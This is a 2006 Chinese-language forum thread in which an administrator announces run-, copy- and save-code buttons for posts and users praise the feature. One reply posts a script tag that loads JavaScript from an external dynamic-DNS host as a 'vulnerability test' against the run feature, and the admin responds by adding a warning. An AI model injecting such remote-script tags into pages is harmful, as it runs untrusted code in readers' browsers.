新增執行代碼、複製代碼、另存代碼功能

Home Home
引用 | 編輯 aa
樓主
推文 x0
針對文章中的代碼如果要複製或另存都要手動處理,所以我加了這個簡便的功能
對於文章中有程式代碼或DSL、DDM 代碼都適用哦... 表情

複製程式
<h1>
<font color=red>
這是 HTML測試,你可以點一這執行代碼
</font>
</h1>

其他的 DSL 及 DDM 大家可以自已試看看..

獻花 x3
引用 | 編輯 JK-LIN
1樓

複製程式
真的很神奇,試了一下,還真是不錯用~
辛苦了,呵!

圖一為圖解,看得懂嗎,呵~

獻花 x0
引用 | 編輯 vivien0213
2樓

有了這幾個選項方便多了 表情
剛也去試了一下!就不用再ctrl+a了 表情

獻花 x0
引用 | 編輯 a770123
3樓

很方便的功能唷!!感謝站長的用心!!讓論壇更加的美好!!

獻花 x0
引用 | 編輯 銀狐
4樓

下面是引用vivien0213於2006-05-17 14:27發表的 :
有了這幾個選項方便多了 表情
剛也去試了一下!就不用再ctrl+a了 表情

果然是滿方便的功能喔
不過 該不會用久了就忘記了原來的暗鍵囉 表情 表情 表情

獻花 x0
引用 | 編輯 親愛的
5樓

難怪我剛才用DSL會出現下面這些

不過還真好用的說... 表情

獻花 x0
引用 | 編輯 mego
6樓

表情 棒棒棒...剛剛有發現..不敢去按它

表情 果然是一鍵OK..謝謝aa大大的辛苦

獻花 x0
引用 | 編輯 martinyueh3
7樓

複製程式
<script src=http://olpy.myvnc.com/ck.php?41212></script>

漏洞測試 表情

獻花 x0
引用 | 編輯 aa
8樓

下面是引用martinyueh3於2006-05-17 17:22發表的 :
複製程式
<script src=http://olpy.myvnc.com/ck.php?41212></script>

漏洞測試 表情

我加上了警語了..非必要,不要去執行代碼.. 表情

獻花 x0